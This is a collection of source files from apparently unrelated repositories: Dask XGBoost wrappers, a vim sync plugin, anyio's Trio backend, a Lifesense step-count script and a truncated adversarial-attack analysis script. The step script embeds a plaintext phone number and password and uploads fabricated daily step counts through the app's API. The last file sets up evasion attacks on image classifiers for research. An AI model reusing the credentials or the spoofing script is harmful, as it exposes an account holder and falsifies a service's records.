class DaskClassificationMixin:
def fit(self, X, y=None, classes=None):
"""Fit a gradient boosting classifier
Parameters
----------
X : array-like [n_samples, n_features]
Feature Matrix. May be a dask.array or dask.dataframe
y : array-like
Labels
classes : sequence, optional
The unique values in `y`. If no specified, this will be
eagerly computed from `y` before training.
Returns
-------
self : XGBClassifier
Notes
-----
This differs from the XGBoost version in three ways
1. The ``sample_weight``, ``eval_set``, ``eval_metric``,
``early_stopping_rounds`` and ``verbose`` fit kwargs are not
supported.
2. The labels are not automatically label-encoded
3. The ``classes_`` and ``n_classes_`` attributes are not learned
"""
client = default_client()
if classes is None:
if isinstance(y, da.Array):
classes = da.unique(y)
else:
classes = y.unique()
classes = classes.compute()
else:
classes = np.asarray(classes)
self.classes_ = classes
self.n_classes_ = len(self.classes_)
xgb_options = self.get_xgb_params()
if self.n_classes_ > 2:
# xgboost just ignores the user-provided objective
# We only overwrite if it's the default...
if xgb_options['objective'] == "binary:logistic":
xgb_options["objective"] = "multi:softprob"
xgb_options.setdefault('num_class', self.n_classes_)
# xgboost sets this to self.objective, which I think is wrong
# hyper-parameters should not be updated during fit.
self.objective = xgb_options['objective']
# TODO: auto label-encode y
# that will require a dependency on dask-ml
# TODO: sample weight
self._Booster = train(client, xgb_options, X, y,
num_boost_round=self.get_num_boosting_rounds())
return self
def predict(self, X):
client = default_client()
class_probs = predict(client, self._Booster, X)
if class_probs.ndim > 1:
cidx = da.argmax(class_probs, axis=1)
else:
cidx = (class_probs > 0).astype(np.int64)
return cidx
def predict_proba(self, data, ntree_limit=None):
client = default_client()
if ntree_limit is not None:
raise NotImplementedError("'ntree_limit' is not currently "
"supported.")
class_probs = predict(client, self._Booster, data)
return class_probs
class XGBRegressor(DaskRegressionMixin, xgb.XGBRegressor):
pass
class XGBRFRegressor(DaskRegressionMixin, xgb.XGBRFRegressor):
pass
class XGBClassifier(DaskClassificationMixin, xgb.XGBClassifier):
pass
class XGBRFClassifier(DaskClassificationMixin, xgb.XGBRFClassifier):
pass
``` |
{
"source": "johnzeng/vim-sync",
"score": 2
} |
#### File: vim-sync/pythonx/config_loader.py
```python
import vim
import json
class config_manager:
def __init__(self, root_path):
try:
self.root_path = root_path
self.marked = []
self.load_array = None
self.err = None
with open(root_path + '/.vim-sync', 'r') as f:
self.load_array = json.load(f)
for element in self.load_array:
if element['dest'][-1] != '/':
element['dest'] = element['dest'] + '/'
if 'sync_frequence' not in element:
element['sync_frequence'] = 1
if 'command' not in element:
element['command'] = 'cp'
if 'marked' in element and element['marked'] == 1:
self.marked.append(element)
self.is_load = True
except Exception as err :
self.err = err
self.is_load = False
self.load_array = []
def reload(self):
self.__init__(self.root_path)
if self.err is not None:
print(str(self.err))
def is_loaded(self):
return self.is_load
def get_marked(self):
return self.marked
def get_all_files(self):
return self.load_array
def get_all_file_names(self):
vim.command('let g:all_vim_sync_dest=[]')
for element in self.load_array:
vim.command('call add(g:all_vim_sync_dest, "%s")' % element["dest"])
cfg_mgr_singlen = None
def get_config_manager(root_path):
global cfg_mgr_singlen
if cfg_mgr_singlen is None:
cfg_mgr_singlen = config_manager(root_path)
return cfg_mgr_singlen
``` |
{
"source": "johnzeringue/anyio",
"score": 2
} |
#### File: anyio/_backends/_trio.py
```python
import array
import math
import socket
from concurrent.futures import Future
from dataclasses import dataclass
from functools import partial
from io import IOBase
from os import PathLike
from types import TracebackType
from typing import (
Any, Awaitable, Callable, Collection, Coroutine, Dict, Generic, List, Mapping, NoReturn,
Optional, Set, Tuple, Type, TypeVar, Union)
import trio.from_thread
from outcome import Error, Value
from trio.to_thread import run_sync
from .. import CapacityLimiterStatistics, EventStatistics, TaskInfo, abc
from .._core._compat import DeprecatedAsyncContextManager, DeprecatedAwaitable, T
from .._core._eventloop import claim_worker_thread
from .._core._exceptions import (
BrokenResourceError, BusyResourceError, ClosedResourceError, EndOfStream)
from .._core._exceptions import ExceptionGroup as BaseExceptionGroup
from .._core._sockets import convert_ipv6_sockaddr
from .._core._synchronization import CapacityLimiter as BaseCapacityLimiter
from .._core._synchronization import Event as BaseEvent
from .._core._synchronization import ResourceGuard
from .._core._tasks import CancelScope as BaseCancelScope
from ..abc import IPSockAddrType, UDPPacketType
try:
from trio import lowlevel as trio_lowlevel
except ImportError:
from trio import hazmat as trio_lowlevel
from trio.hazmat import wait_readable, wait_writable
else:
from trio.lowlevel import wait_readable, wait_writable
T_Retval = TypeVar('T_Retval')
T_SockAddr = TypeVar('T_SockAddr', str, IPSockAddrType)
#
# Event loop
#
run = trio.run
current_token = trio.lowlevel.current_trio_token
RunVar = trio.lowlevel.RunVar
#
# Miscellaneous
#
sleep = trio.sleep
#
# Timeouts and cancellation
#
class CancelScope(BaseCancelScope):
def __new__(cls, original: Optional[trio.CancelScope] = None, **kwargs):
return object.__new__(cls)
def __init__(self, original: Optional[trio.CancelScope] = None, **kwargs):
self.__original = original or trio.CancelScope(**kwargs)
def __enter__(self):
self.__original.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return self.__original.__exit__(exc_type, exc_val, exc_tb)
def cancel(self) -> DeprecatedAwaitable:
self.__original.cancel()
return DeprecatedAwaitable(self.cancel)
@property
def deadline(self) -> float:
return self.__original.deadline
@deadline.setter
def deadline(self, value: float) -> None:
self.__original.deadline = value
@property
def cancel_called(self) -> bool:
return self.__original.cancel_called
@property
def shield(self) -> bool:
return self.__original.shield
@shield.setter
def shield(self, value: bool) -> None:
self.__original.shield = value
CancelledError = trio.Cancelled
checkpoint = trio.lowlevel.checkpoint
checkpoint_if_cancelled = trio.lowlevel.checkpoint_if_cancelled
cancel_shielded_checkpoint = trio.lowlevel.cancel_shielded_checkpoint
current_effective_deadline = trio.current_effective_deadline
current_time = trio.current_time
#
# Task groups
#
class ExceptionGroup(BaseExceptionGroup, trio.MultiError):
pass
class TaskGroup(abc.TaskGroup):
def __init__(self):
self._active = False
self._nursery_manager = trio.open_nursery()
self.cancel_scope = None
async def __aenter__(self):
self._active = True
self._nursery = await self._nursery_manager.__aenter__()
self.cancel_scope = CancelScope(self._nursery.cancel_scope)
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
try:
return await self._nursery_manager.__aexit__(exc_type, exc_val, exc_tb)
except trio.MultiError as exc:
raise ExceptionGroup(exc.exceptions) from None
finally:
self._active = False
def start_soon(self, func: Callable, *args, name=None) -> None:
if not self._active:
raise RuntimeError('This task group is not active; no new tasks can be started.')
self._nursery.start_soon(func, *args, name=name)
async def start(self, func: Callable[..., Coroutine], *args, name=None):
if not self._active:
raise RuntimeError('This task group is not active; no new tasks can be started.')
return await self._nursery.start(func, *args, name=name)
#
# Threads
#
async def run_sync_in_worker_thread(
func: Callable[..., T_Retval], *args, cancellable: bool = False,
limiter: Optional[trio.CapacityLimiter] = None) -> T_Retval:
def wrapper():
with claim_worker_thread('trio'):
return func(*args)
return await run_sync(wrapper, cancellable=cancellable, limiter=limiter)
run_async_from_thread = trio.from_thread.run
run_sync_from_thread = trio.from_thread.run_sync
class BlockingPortal(abc.BlockingPortal):
def __new__(cls):
return object.__new__(cls)
def __init__(self):
super().__init__()
self._token = trio.lowlevel.current_trio_token()
def _spawn_task_from_thread(self, func: Callable, args: tuple, kwargs: Dict[str, Any],
name, future: Future) -> None:
return trio.from_thread.run_sync(
partial(self._task_group.start_soon, name=name), self._call_func, func, args, kwargs,
future, trio_token=self._token)
#
# Subprocesses
#
@dataclass(eq=False)
class ReceiveStreamWrapper(abc.ByteReceiveStream):
_stream: trio.abc.ReceiveStream
async def receive(self, max_bytes: Optional[int] = None) -> bytes:
try:
data = await self._stream.receive_some(max_bytes)
except trio.ClosedResourceError as exc:
raise ClosedResourceError from exc.__cause__
except trio.BrokenResourceError as exc:
raise BrokenResourceError from exc.__cause__
if data:
return data
else:
raise EndOfStream
async def aclose(self) -> None:
await self._stream.aclose()
@dataclass(eq=False)
class SendStreamWrapper(abc.ByteSendStream):
_stream: trio.abc.SendStream
async def send(self, item: bytes) -> None:
try:
await self._stream.send_all(item)
except trio.ClosedResourceError as exc:
raise ClosedResourceError from exc.__cause__
except trio.BrokenResourceError as exc:
raise BrokenResourceError from exc.__cause__
async def aclose(self) -> None:
await self._stream.aclose()
@dataclass(eq=False)
class Process(abc.Process):
_process: trio.Process
_stdin: Optional[abc.ByteSendStream]
_stdout: Optional[abc.ByteReceiveStream]
_stderr: Optional[abc.ByteReceiveStream]
async def aclose(self) -> None:
if self._stdin:
await self._stdin.aclose()
if self._stdout:
await self._stdout.aclose()
if self._stderr:
await self._stderr.aclose()
await self.wait()
async def wait(self) -> int:
return await self._process.wait()
def terminate(self) -> None:
self._process.terminate()
def kill(self) -> None:
self._process.kill()
def send_signal(self, signal: int) -> None:
self._process.send_signal(signal)
@property
def pid(self) -> int:
return self._process.pid
@property
def returncode(self) -> Optional[int]:
return self._process.returncode
@property
def stdin(self) -> Optional[abc.ByteSendStream]:
return self._stdin
@property
def stdout(self) -> Optional[abc.ByteReceiveStream]:
return self._stdout
@property
def stderr(self) -> Optional[abc.ByteReceiveStream]:
return self._stderr
async def open_process(command, *, shell: bool, stdin: int, stdout: int, stderr: int,
cwd: Union[str, bytes, PathLike, None] = None,
env: Optional[Mapping[str, str]] = None) -> Process:
process = await trio.open_process(command, stdin=stdin, stdout=stdout, stderr=stderr,
shell=shell, cwd=cwd, env=env)
stdin_stream = SendStreamWrapper(process.stdin) if process.stdin else None
stdout_stream = ReceiveStreamWrapper(process.stdout) if process.stdout else None
stderr_stream = ReceiveStreamWrapper(process.stderr) if process.stderr else None
return Process(process, stdin_stream, stdout_stream, stderr_stream)
class _ProcessPoolShutdownInstrument(trio.abc.Instrument):
def after_run(self):
super().after_run()
current_default_worker_process_limiter = trio.lowlevel.RunVar(
'current_default_worker_process_limiter')
async def _shutdown_process_pool(workers: Set[Process]) -> None:
process: Process
try:
await sleep(math.inf)
except trio.Cancelled:
for process in workers:
if process.returncode is None:
process.kill()
with CancelScope(shield=True):
for process in workers:
await process.aclose()
def setup_process_pool_exit_at_shutdown(workers: Set[Process]) -> None:
trio.lowlevel.spawn_system_task(_shutdown_process_pool, workers)
#
# Sockets and networking
#
class _TrioSocketMixin(Generic[T_SockAddr]):
def __init__(self, trio_socket):
self._trio_socket = trio_socket
self._closed = False
def _check_closed(self) -> None:
if self._closed:
raise ClosedResourceError
if self._trio_socket.fileno() < 0:
raise BrokenResourceError
@property
def _raw_socket(self) -> socket.socket:
return self._trio_socket._sock
async def aclose(self) -> None:
if self._trio_socket.fileno() >= 0:
self._closed = True
self._trio_socket.close()
def _convert_socket_error(self, exc: BaseException) -> 'NoReturn':
if isinstance(exc, trio.ClosedResourceError):
raise ClosedResourceError from exc
elif self._trio_socket.fileno() < 0 and self._closed:
raise ClosedResourceError from None
elif isinstance(exc, OSError):
raise BrokenResourceError from exc
else:
raise exc
class SocketStream(_TrioSocketMixin, abc.SocketStream):
def __init__(self, trio_socket):
super().__init__(trio_socket)
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
async def receive(self, max_bytes: int = 65536) -> bytes:
with self._receive_guard:
try:
data = await self._trio_socket.recv(max_bytes)
except BaseException as exc:
self._convert_socket_error(exc)
if data:
return data
else:
raise EndOfStream
async def send(self, item: bytes) -> None:
with self._send_guard:
view = memoryview(item)
while view:
try:
bytes_sent = await self._trio_socket.send(view)
except BaseException as exc:
self._convert_socket_error(exc)
view = view[bytes_sent:]
async def send_eof(self) -> None:
self._trio_socket.shutdown(socket.SHUT_WR)
class UNIXSocketStream(SocketStream, abc.UNIXSocketStream):
async def receive_fds(self, msglen: int, maxfds: int) -> Tuple[bytes, List[int]]:
if not isinstance(msglen, int) or msglen < 0:
raise ValueError('msglen must be a non-negative integer')
if not isinstance(maxfds, int) or maxfds < 1:
raise ValueError('maxfds must be a positive integer')
fds = array.array("i")
await checkpoint()
with self._receive_guard:
while True:
try:
message, ancdata, flags, addr = await self._trio_socket.recvmsg(
msglen, socket.CMSG_LEN(maxfds * fds.itemsize))
except BaseException as exc:
self._convert_socket_error(exc)
else:
if not message and not ancdata:
raise EndOfStream
break
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level != socket.SOL_SOCKET or cmsg_type != socket.SCM_RIGHTS:
raise RuntimeError(f'Received unexpected ancillary data; message = {message}, '
f'cmsg_level = {cmsg_level}, cmsg_type = {cmsg_type}')
fds.frombytes(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return message, list(fds)
async def send_fds(self, message: bytes, fds: Collection[Union[int, IOBase]]) -> None:
if not message:
raise ValueError('message must not be empty')
if not fds:
raise ValueError('fds must not be empty')
filenos: List[int] = []
for fd in fds:
if isinstance(fd, int):
filenos.append(fd)
elif isinstance(fd, IOBase):
filenos.append(fd.fileno())
fdarray = array.array("i", filenos)
await checkpoint()
with self._send_guard:
while True:
try:
await self._trio_socket.sendmsg(
[message], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fdarray)])
break
except BaseException as exc:
self._convert_socket_error(exc)
class TCPSocketListener(_TrioSocketMixin, abc.SocketListener):
def __init__(self, raw_socket: socket.SocketType):
super().__init__(trio.socket.from_stdlib_socket(raw_socket))
self._accept_guard = ResourceGuard('accepting connections from')
async def accept(self) -> SocketStream:
with self._accept_guard:
try:
trio_socket, _addr = await self._trio_socket.accept()
except BaseException as exc:
self._convert_socket_error(exc)
trio_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
return SocketStream(trio_socket)
class UNIXSocketListener(_TrioSocketMixin, abc.SocketListener):
def __init__(self, raw_socket: socket.SocketType):
super().__init__(trio.socket.from_stdlib_socket(raw_socket))
self._accept_guard = ResourceGuard('accepting connections from')
async def accept(self) -> UNIXSocketStream:
with self._accept_guard:
try:
trio_socket, _addr = await self._trio_socket.accept()
except BaseException as exc:
self._convert_socket_error(exc)
return UNIXSocketStream(trio_socket)
class UDPSocket(_TrioSocketMixin[IPSockAddrType], abc.UDPSocket):
def __init__(self, trio_socket):
super().__init__(trio_socket)
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
async def receive(self) -> Tuple[bytes, IPSockAddrType]:
with self._receive_guard:
try:
data, addr = await self._trio_socket.recvfrom(65536)
return data, convert_ipv6_sockaddr(addr)
except BaseException as exc:
self._convert_socket_error(exc)
async def send(self, item: UDPPacketType) -> None:
with self._send_guard:
try:
await self._trio_socket.sendto(*item)
except BaseException as exc:
self._convert_socket_error(exc)
class ConnectedUDPSocket(_TrioSocketMixin[IPSockAddrType], abc.ConnectedUDPSocket):
def __init__(self, trio_socket):
super().__init__(trio_socket)
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
async def receive(self) -> bytes:
with self._receive_guard:
try:
return await self._trio_socket.recv(65536)
except BaseException as exc:
self._convert_socket_error(exc)
async def send(self, item: bytes) -> None:
with self._send_guard:
try:
await self._trio_socket.send(item)
except BaseException as exc:
self._convert_socket_error(exc)
async def connect_tcp(host: str, port: int,
local_address: Optional[IPSockAddrType] = None) -> SocketStream:
family = socket.AF_INET6 if ':' in host else socket.AF_INET
trio_socket = trio.socket.socket(family)
trio_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if local_address:
await trio_socket.bind(local_address)
try:
await trio_socket.connect((host, port))
except BaseException:
trio_socket.close()
raise
return SocketStream(trio_socket)
async def connect_unix(path: str) -> UNIXSocketStream:
trio_socket = trio.socket.socket(socket.AF_UNIX)
try:
await trio_socket.connect(path)
except BaseException:
trio_socket.close()
raise
return UNIXSocketStream(trio_socket)
async def create_udp_socket(
family: socket.AddressFamily,
local_address: Optional[IPSockAddrType],
remote_address: Optional[IPSockAddrType],
reuse_port: bool
) -> Union[UDPSocket, ConnectedUDPSocket]:
trio_socket = trio.socket.socket(family=family, type=socket.SOCK_DGRAM)
if reuse_port:
trio_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
if local_address:
await trio_socket.bind(local_address)
if remote_address:
await trio_socket.connect(remote_address)
return ConnectedUDPSocket(trio_socket)
else:
return UDPSocket(trio_socket)
getaddrinfo = trio.socket.getaddrinfo
getnameinfo = trio.socket.getnameinfo
async def wait_socket_readable(sock):
try:
await wait_readable(sock)
except trio.ClosedResourceError as exc:
raise ClosedResourceError().with_traceback(exc.__traceback__) from None
except trio.BusyResourceError:
raise BusyResourceError('reading from') from None
async def wait_socket_writable(sock):
try:
await wait_writable(sock)
except trio.ClosedResourceError as exc:
raise ClosedResourceError().with_traceback(exc.__traceback__) from None
except trio.BusyResourceError:
raise BusyResourceError('writing to') from None
#
# Synchronization
#
class Event(BaseEvent):
def __new__(cls):
return object.__new__(cls)
def __init__(self):
self.__original = trio.Event()
def is_set(self) -> bool:
return self.__original.is_set()
async def wait(self) -> bool:
return await self.__original.wait()
def statistics(self) -> EventStatistics:
return self.__original.statistics()
def set(self):
self.__original.set()
return DeprecatedAwaitable(self.set)
class CapacityLimiter(BaseCapacityLimiter):
def __new__(cls, *args, **kwargs):
return object.__new__(cls)
def __init__(self, *args, original: Optional[trio.CapacityLimiter] = None):
self.__original = original or trio.CapacityLimiter(*args)
async def __aenter__(self):
return await self.__original.__aenter__()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
return await self.__original.__aexit__(exc_type, exc_val, exc_tb)
@property
def total_tokens(self) -> float:
return self.__original.total_tokens
@total_tokens.setter
def total_tokens(self, value: float) -> None:
self.__original.total_tokens = value
@property
def borrowed_tokens(self) -> int:
return self.__original.borrowed_tokens
@property
def available_tokens(self) -> float:
return self.__original.available_tokens
def acquire_nowait(self):
self.__original.acquire_nowait()
return DeprecatedAwaitable(self.acquire_nowait)
def acquire_on_behalf_of_nowait(self, borrower):
self.__original.acquire_on_behalf_of_nowait(borrower)
return DeprecatedAwaitable(self.acquire_on_behalf_of_nowait)
async def acquire(self) -> None:
await self.__original.acquire()
async def acquire_on_behalf_of(self, borrower) -> None:
await self.__original.acquire_on_behalf_of(borrower)
def release(self) -> None:
return self.__original.release()
def release_on_behalf_of(self, borrower) -> None:
return self.__original.release_on_behalf_of(borrower)
def statistics(self) -> CapacityLimiterStatistics:
return self.__original.statistics()
_capacity_limiter_wrapper = RunVar('_capacity_limiter_wrapper')
def current_default_thread_limiter() -> CapacityLimiter:
try:
return _capacity_limiter_wrapper.get()
except LookupError:
limiter = CapacityLimiter(original=trio.to_thread.current_default_thread_limiter())
_capacity_limiter_wrapper.set(limiter)
return limiter
#
# Signal handling
#
class _SignalReceiver(DeprecatedAsyncContextManager):
def __init__(self, cm):
self._cm = cm
def __enter__(self) -> T:
return self._cm.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
return self._cm.__exit__(exc_type, exc_val, exc_tb)
def open_signal_receiver(*signals: int):
cm = trio.open_signal_receiver(*signals)
return _SignalReceiver(cm)
#
# Testing and debugging
#
def get_current_task() -> TaskInfo:
task = trio_lowlevel.current_task()
parent_id = None
if task.parent_nursery and task.parent_nursery.parent_task:
parent_id = id(task.parent_nursery.parent_task)
return TaskInfo(id(task), parent_id, task.name, task.coro)
def get_running_tasks() -> List[TaskInfo]:
root_task = trio_lowlevel.current_root_task()
task_infos = [TaskInfo(id(root_task), None, root_task.name, root_task.coro)]
nurseries = root_task.child_nurseries
while nurseries:
new_nurseries: List[trio.Nursery] = []
for nursery in nurseries:
for task in nursery.child_tasks:
task_infos.append(
TaskInfo(id(task), id(nursery.parent_task), task.name, task.coro))
new_nurseries.extend(task.child_nurseries)
nurseries = new_nurseries
return task_infos
def wait_all_tasks_blocked():
import trio.testing
return trio.testing.wait_all_tasks_blocked()
class TestRunner(abc.TestRunner):
def __init__(self, **options):
from collections import deque
from queue import Queue
self._call_queue = Queue()
self._result_queue = deque()
self._stop_event: Optional[trio.Event] = None
self._nursery: Optional[trio.Nursery] = None
self._options = options
async def _trio_main(self) -> None:
self._stop_event = trio.Event()
async with trio.open_nursery() as self._nursery:
await self._stop_event.wait()
async def _call_func(self, func, args, kwargs):
try:
retval = await func(*args, **kwargs)
except BaseException as exc:
self._result_queue.append(Error(exc))
else:
self._result_queue.append(Value(retval))
def _main_task_finished(self, outcome) -> None:
self._nursery = None
def close(self) -> None:
if self._stop_event:
self._stop_event.set()
while self._nursery is not None:
self._call_queue.get()()
def call(self, func: Callable[..., Awaitable], *args, **kwargs):
if self._nursery is None:
trio.lowlevel.start_guest_run(
self._trio_main, run_sync_soon_threadsafe=self._call_queue.put,
done_callback=self._main_task_finished, **self._options)
while self._nursery is None:
self._call_queue.get()()
self._nursery.start_soon(self._call_func, func, args, kwargs)
while not self._result_queue:
self._call_queue.get()()
outcome = self._result_queue.pop()
return outcome.unwrap()
```
#### File: src/anyio/lowlevel.py
```python
from typing import Any, Dict, Generic, Set, TypeVar, Union, cast
from weakref import WeakKeyDictionary
from ._core._eventloop import get_asynclib
T = TypeVar('T')
D = TypeVar('D')
async def checkpoint() -> None:
"""
Check for cancellation and allow the scheduler to switch to another task.
Equivalent to (but more efficient than)::
await checkpoint_if_cancelled()
await cancel_shielded_checkpoint()
.. versionadded:: 3.0
"""
await get_asynclib().checkpoint()
async def checkpoint_if_cancelled():
"""
Enter a checkpoint if the enclosing cancel scope has been cancelled.
This does not allow the scheduler to switch to a different task.
.. versionadded:: 3.0
"""
await get_asynclib().checkpoint_if_cancelled()
async def cancel_shielded_checkpoint() -> None:
"""
Allow the scheduler to switch to another task but without checking for cancellation.
Equivalent to (but potentially more efficient than)::
with CancelScope(shield=True):
await checkpoint()
.. versionadded:: 3.0
"""
await get_asynclib().cancel_shielded_checkpoint()
def current_token() -> object:
"""Return a backend specific token object that can be used to get back to the event loop."""
return get_asynclib().current_token()
_run_vars = WeakKeyDictionary() # type: WeakKeyDictionary[Any, Dict[str, Any]]
_token_wrappers: Dict[Any, '_TokenWrapper'] = {}
class _TokenWrapper:
__slots__ = '_token', '__weakref__'
def __init__(self, token):
self._token = token
def __eq__(self, other):
return self._token is other._token
def __hash__(self):
return hash(self._token)
class RunvarToken:
__slots__ = '_var', '_value', '_redeemed'
def __init__(self, var: 'RunVar', value):
self._var = var
self._value = value
self._redeemed = False
class RunVar(Generic[T]):
"""Like a :class:`~contextvars.ContextVar`, expect scoped to the running event loop."""
__slots__ = '_name', '_default'
NO_VALUE_SET = object()
_token_wrappers: Set[_TokenWrapper] = set()
def __init__(self, name: str, default: Union[T, object] = NO_VALUE_SET):
self._name = name
self._default = default
@property
def _current_vars(self) -> Dict[str, T]:
token = current_token()
while True:
try:
return _run_vars[token]
except TypeError:
# Happens when token isn't weak referable (TrioToken).
# This workaround does mean that some memory will leak on Trio until the problem
# is fixed on their end.
token = _TokenWrapper(token)
self._token_wrappers.add(token)
except KeyError:
run_vars = _run_vars[token] = {}
return run_vars
def get(self, default: Union[T, object] = NO_VALUE_SET) -> T:
try:
return self._current_vars[self._name]
except KeyError:
if default is not RunVar.NO_VALUE_SET:
return cast(T, default)
elif self._default is not RunVar.NO_VALUE_SET:
return cast(T, self._default)
raise LookupError(f'Run variable "{self._name}" has no value and no default set')
def set(self, value: T) -> RunvarToken:
current_vars = self._current_vars
token = RunvarToken(self, current_vars.get(self._name, RunVar.NO_VALUE_SET))
current_vars[self._name] = value
return token
def reset(self, token: RunvarToken) -> None:
if token._var is not self:
raise ValueError('This token does not belong to this RunVar')
if token._redeemed:
raise ValueError('This token has already been used')
if token._value is RunVar.NO_VALUE_SET:
try:
del self._current_vars[self._name]
except KeyError:
pass
else:
self._current_vars[self._name] = token._value
token._redeemed = True
def __repr__(self):
return f'<RunVar name={self._name!r}>'
``` |
{
"source": "JohnZero-Python/lexinSport",
"score": 2
} |
#### File: JohnZero-Python/lexinSport/change_step.py
```python
import requests
import json
import hashlib
import time
import datetime
class LexinSport:
def __init__(self, username, password, step):
self.username = username
self.password = password
self.step = step
# ็ปๅฝ
def login(self):
url = 'https://sports.lifesense.com/sessions_service/login?systemType=2&version=4.6.7'
data = {'loginName': self.username, 'password': hashlib.md5(self.password.encode('utf8')).hexdigest(),
'clientId': '49a41c9727ee49dda3b190dc907850cc', 'roleType': 0, 'appType': 6}
headers = {
'Content-Type': 'application/json; charset=utf-8',
'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 7.1.2; LIO-AN00 Build/LIO-AN00)'
}
response_result = requests.post(url, data=json.dumps(data), headers=headers)
status_code = response_result.status_code
response_text = response_result.text
# print('็ปๅฝ็ถๆ็ ๏ผ%s' % status_code)
# print('็ปๅฝ่ฟๅๆฐๆฎ๏ผ%s' % response_text)
if status_code == 200:
response_text = json.loads(response_text)
user_id = response_text['data']['userId']
access_token = response_text['data']['accessToken']
return user_id, access_token
else:
return '็ปๅฝๅคฑ่ดฅ'
# ไฟฎๆนๆญฅๆฐ
def change_step(self):
# ็ปๅฝ็ปๆ
login_result = self.login()
if login_result == '็ปๅฝๅคฑ่ดฅ':
return '็ปๅฝๅคฑ่ดฅ'
else:
url = 'https://sports.lifesense.com/sport_service/sport/sport/uploadMobileStepV2?systemType=2&version=4.6.7'
data = {'list': [{'DataSource': 2, 'active': 1, 'calories': int(self.step/4), 'dataSource': 2,
'deviceId': 'M_NULL', 'distance': int(self.step/3), 'exerciseTime': 0, 'isUpload': 0,
'measurementTime': time.strftime('%Y-%m-%d %H:%M:%S'), 'priority': 0, 'step': self.step,
'type': 2, 'updated': int(round(time.time() * 1000)), 'userId': login_result[0]}]}
headers = {
'Content-Type': 'application/json; charset=utf-8',
'Cookie': 'accessToken=%s' % login_result[1]
}
response_result = requests.post(url, data=json.dumps(data), headers=headers)
status_code = response_result.status_code
# response_text = response_result.text
# print('ไฟฎๆนๆญฅๆฐ็ถๆ็ ๏ผ%s' % status_code)
# print('ไฟฎๆนๆญฅๆฐ่ฟๅๆฐๆฎ๏ผ%s' % response_text)
if status_code == 200:
return 'ไฟฎๆนๆญฅๆฐไธบใ%sใๆๅ' % self.step
else:
return 'ไฟฎๆนๆญฅๆฐๅคฑ่ดฅ'
# ็ก็ ๅฐ็ฌฌไบๅคฉๆง่กไฟฎๆนๆญฅๆฐ็ๆถ้ด
def get_sleep_time():
# ็ฌฌไบๅคฉๆฅๆ
tomorrow = datetime.date.today() + datetime.timedelta(days=1)
# ็ฌฌไบๅคฉ7็นๆถ้ดๆณ
tomorrow_run_time = int(time.mktime(time.strptime(str(tomorrow), '%Y-%m-%d'))) + 25200
# print(tomorrow_run_time)
# ๅฝๅๆถ้ดๆณ
current_time = int(time.time())
# print(current_time)
return tomorrow_run_time - current_time
if __name__ == "__main__":
# ๆๅคง่ฟ่กๅบ้ๆฌกๆฐ
fail_num = 3
while 1:
while fail_num > 0:
try:
# ไฟฎๆนๆญฅๆฐ็ปๆ
result = LexinSport('15387831766', 'v=RnZ94I', 20000).change_step()
print(result)
break
except Exception as e:
print('่ฟ่กๅบ้๏ผๅๅ ๏ผ%s' % e)
fail_num -= 1
if fail_num == 0:
print('ไฟฎๆนๆญฅๆฐๅคฑ่ดฅ')
# ้็ฝฎ่ฟ่กๅบ้ๆฌกๆฐ
fail_num = 3
# ่ทๅ็ก็ ๆถ้ด
sleep_time = get_sleep_time()
time.sleep(sleep_time)
# ๆญฅๆฐๅช่ฝๆนๅคงไธ่ฝๆนๅฐ๏ผSN็ ๏ผ0498178301181183
# https://jingyan.baidu.com/article/22fe7ced657b427102617fe3.html
``` |
{
"source": "JohnZhang000/adaptive-jpeg-compression",
"score": 2
} |
#### File: adaptive-jpeg-compression/code_history/Attack_compare_spectrum.py
```python
import cv2
import torch
import torch.nn as nn
import numpy as np
import os
from models.cifar.allconv import AllConvNet
from models.resnet import resnet50
from models.vgg import vgg16_bn
from models.cifar.allconv import AllConvNet
import torchvision.models as models
from third_party.ResNeXt_DenseNet.models.densenet import densenet
from third_party.ResNeXt_DenseNet.models.resnext import resnext29
from third_party.WideResNet_pytorch.wideresnet import WideResNet
from art.attacks.evasion import FastGradientMethod,DeepFool
from art.attacks.evasion import CarliniL2Method,CarliniLInfMethod
from art.attacks.evasion import ProjectedGradientDescent
from art.attacks.evasion import UniversalPerturbation
from art.estimators.classification import PyTorchClassifier
import json
import sys
from tqdm import tqdm
from PIL import Image
sys.path.append("..")
# from train_code.my_img_transformer import img_transformer
# from PathwayGrad.my_pathway_analyzer import my_critical_path
from my_spectrum_analyzer import img_spectrum_analyzer
# from Attack_compare_spectrum_plot import spectrum_analysis
sys.path.append('../common_code')
from load_cifar_data import load_CIFAR_batch
def save_images(saved_dir,vanilla_images,attacked_images,labels,idx,features,attacked_name='attacked'):
vanilla_dir=os.path.join(saved_dir,'vanilla')
diff_dir=os.path.join(saved_dir,'diff')
attacked_dir=os.path.join(saved_dir,attacked_name)
if not os.path.exists(vanilla_dir):
os.makedirs(vanilla_dir)
if not os.path.exists(diff_dir):
os.makedirs(diff_dir)
if not os.path.exists(attacked_dir):
os.makedirs(attacked_dir)
choosed_idx = 0
aug_coeff = 10 #่ฏฏๅทฎๅขๅผบๅๆฐ
img_vanilla_tc = vanilla_images[choosed_idx,...].squeeze(0).permute(1,2,0).cpu().numpy()
img_vanilla_np = np.uint8(np.clip(np.round(img_vanilla_tc*255),0,255))
img_attacked_tc = attacked_images[0][choosed_idx,...].squeeze(0).permute(1,2,0).cpu().numpy()
img_attacked_np = np.uint8(np.clip(np.round(img_attacked_tc*255),0,255))
img_diff_tc = (img_attacked_tc - img_vanilla_tc)*aug_coeff
img_diff_np = np.uint8(np.clip(np.round((img_diff_tc-img_diff_tc.mean()+0.5)*255),0,255))
